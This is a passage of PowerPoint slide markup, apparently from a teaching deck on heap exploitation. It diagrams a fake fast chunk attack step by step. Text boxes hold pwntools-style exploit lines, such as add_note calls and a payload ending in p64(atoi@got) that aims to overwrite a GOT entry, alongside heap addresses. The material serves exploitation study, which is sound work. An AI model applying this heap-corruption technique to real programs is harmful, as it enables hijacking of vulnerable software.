      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2879" name="Shape 2879"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2877" idx="2"/>
            <a:endCxn id="2878" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5420000" y="3073600"/>
            <a:ext cx="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Shape 28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fake fast chunk</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2885" name="Shape 2885"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="314875" y="2665038"/>
            <a:ext cx="31482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edit(1, fake_fast_chunk_addr)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6" name="Shape 2886"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978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87" name="Shape 2887"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978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888" name="Shape 2888"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12862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89" name="Shape 2889"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12862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890" name="Shape 2890"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23746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91" name="Shape 2891"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23746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892" name="Shape 2892"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34630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3" name="Shape 2893"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45514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94" name="Shape 2894"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45514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895" name="Shape 2895"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978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2896" name="Shape 2896"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1286275" y="2235413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897" name="Shape 2897"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23746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2898" name="Shape 2898"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45514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2899" name="Shape 2899"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="197875" y="1751325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00" name="Shape 2900"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12862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01" name="Shape 2901"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23746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02" name="Shape 2902"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45514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03" name="Shape 2903"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="56398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04" name="Shape 2904"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639875" y="19864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size=0x78</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2905" name="Shape 2905"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639875" y="22354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0x604a90</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2906" name="Shape 2906"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639875" y="17513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07" name="Shape 2907"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4255750" y="276055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bin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2908" name="Shape 2908"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4255750" y="341000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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2909" name="Shape 2909"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2907" idx="2"/>
            <a:endCxn id="2908" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4859050" y="3009550"/>
            <a:ext cx="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0" name="Shape 2910"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4859050" y="3659000"/>
            <a:ext cx="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1" name="Shape 2911"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4255750" y="4059450"/>
            <a:ext cx="12066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0x603098</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2912" name="Shape 2912"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728275" y="1502288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Shape 2913"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728275" y="17513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Shape 2914"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728275" y="2000338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Shape 2915"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728275" y="22354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Shape 2916"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5688675" y="1103488"/>
            <a:ext cx="120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0x603098</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2917" name="Shape 2917"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6380175" y="1318450"/>
            <a:ext cx="16350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918" name="Shape 2918"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463075" y="1979475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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2919" name="Shape 2919"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463075" y="2228475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920" name="Shape 2920"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463075" y="1744375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</a:t>
            </a:r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4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Shape 29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 fake fast chunk</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2926" name="Shape 2926"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="314875" y="2665038"/>
            <a:ext cx="31482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add_note('C' * (0x70 - 8))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7" name="Shape 2927"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978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28" name="Shape 2928"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978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929" name="Shape 2929"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12862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0" name="Shape 2930"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12862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931" name="Shape 2931"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23746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32" name="Shape 2932"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23746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933" name="Shape 2933"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34630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34" name="Shape 2934"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34630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size=0x68</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2935" name="Shape 2935"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45514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36" name="Shape 2936"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45514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937" name="Shape 2937"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978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2938" name="Shape 2938"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1286275" y="2235413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939" name="Shape 2939"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23746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2940" name="Shape 2940"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34630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941" name="Shape 2941"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45514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2942" name="Shape 2942"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="197875" y="1751325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43" name="Shape 2943"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12862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44" name="Shape 2944"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23746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45" name="Shape 2945"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45514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46" name="Shape 2946"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="56398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47" name="Shape 2947"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639875" y="19864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size=0x78</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2948" name="Shape 2948"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639875" y="22354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0x604a90</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2949" name="Shape 2949"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639875" y="17513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50" name="Shape 2950"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4255750" y="2760550"/>
            <a:ext cx="12066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bin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2951" name="Shape 2951"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2950" idx="2"/>
            <a:endCxn id="2952" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4859050" y="3009550"/>
            <a:ext cx="0" cy="10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2" name="Shape 2952"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4255750" y="4059450"/>
            <a:ext cx="12066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0x603098</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2953" name="Shape 2953"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728275" y="1502288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Shape 2954"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728275" y="17513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Shape 2955"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728275" y="2000338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Shape 2956"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34630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57" name="Shape 2957"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728275" y="22354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8" name="Shape 2958"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5688675" y="1103488"/>
            <a:ext cx="120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0x603098</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2959" name="Shape 2959"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6380175" y="1318450"/>
            <a:ext cx="16350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Shape 29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the fake fast chunk</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2965" name="Shape 2965"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="314875" y="2665038"/>
            <a:ext cx="31482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add_note('D' * (0x70 - 8))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6" name="Shape 2966"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978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7" name="Shape 2967"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978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968" name="Shape 2968"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12862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69" name="Shape 2969"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12862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970" name="Shape 2970"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23746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71" name="Shape 2971"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23746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972" name="Shape 2972"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34630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73" name="Shape 2973"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34630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size=0x68</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2974" name="Shape 2974"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45514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75" name="Shape 2975"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45514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2976" name="Shape 2976"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978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2977" name="Shape 2977"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1286275" y="2235413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978" name="Shape 2978"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23746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2979" name="Shape 2979"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34630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2980" name="Shape 2980"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45514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2981" name="Shape 2981"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="197875" y="1751325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82" name="Shape 2982"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12862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83" name="Shape 2983"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23746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84" name="Shape 2984"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45514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85" name="Shape 2985"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="56398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86" name="Shape 2986"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639875" y="19864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size=0x78</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2987" name="Shape 2987"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639875" y="2235413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DDDD..D</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2988" name="Shape 2988"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639875" y="17513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89" name="Shape 2989"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728275" y="1502288"/>
            <a:ext cx="1088400" cy="2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90" name="Shape 2990"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728275" y="1751313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91" name="Shape 2991"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728275" y="2000338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size=0x68</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2992" name="Shape 2992"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34630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2993" name="Shape 2993"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728275" y="2235413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0x6030a8</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2994" name="Shape 2994"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5688675" y="1103488"/>
            <a:ext cx="120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0x603098</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2995" name="Shape 2995"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6380175" y="1318450"/>
            <a:ext cx="16350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996" name="Shape 2996"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7816675" y="1502338"/>
            <a:ext cx="1088400" cy="2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2997" name="Shape 2997"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7816675" y="1751363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DDDD..D</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2998" name="Shape 2998"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7816675" y="2000388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DDDD..D</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2999" name="Shape 2999"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7816675" y="2235463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DDDD..D</a:t>
            </a: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Shape 30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the fake fast chunk</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3005" name="Shape 3005"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="314875" y="2665038"/>
            <a:ext cx="31482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payload = 'D' * 8 * 4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payload += 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p64(1)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payload += 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p64(8)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payload += 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p64(atoi@got)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add_note(payload)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6" name="Shape 3006"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978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07" name="Shape 3007"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978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3008" name="Shape 3008"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12862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09" name="Shape 3009"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12862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3010" name="Shape 3010"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23746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11" name="Shape 3011"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23746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3012" name="Shape 3012"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34630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13" name="Shape 3013"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34630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size=0x68</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3014" name="Shape 3014"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45514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15" name="Shape 3015"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45514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3016" name="Shape 3016"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978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3017" name="Shape 3017"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1286275" y="2235413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3018" name="Shape 3018"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23746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3019" name="Shape 3019"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34630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3020" name="Shape 3020"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45514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3021" name="Shape 3021"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="197875" y="1751325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22" name="Shape 3022"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12862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23" name="Shape 3023"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23746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24" name="Shape 3024"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45514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25" name="Shape 3025"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="56398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026" name="Shape 3026"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639875" y="19864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size=0x78</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3027" name="Shape 3027"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639875" y="2235413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DDDD..D</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3028" name="Shape 3028"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639875" y="17513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29" name="Shape 3029"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728275" y="1502288"/>
            <a:ext cx="1088400" cy="2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30" name="Shape 3030"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728275" y="1751313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31" name="Shape 3031"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728275" y="2000338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size=0x68</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3032" name="Shape 3032"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34630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33" name="Shape 3033"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728275" y="2235413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0x6030a8</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3034" name="Shape 3034"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5688675" y="1103488"/>
            <a:ext cx="120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0x603098</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3035" name="Shape 3035"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6380175" y="1318450"/>
            <a:ext cx="16350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36" name="Shape 3036"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7816675" y="1502338"/>
            <a:ext cx="1088400" cy="2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3037" name="Shape 3037"/>
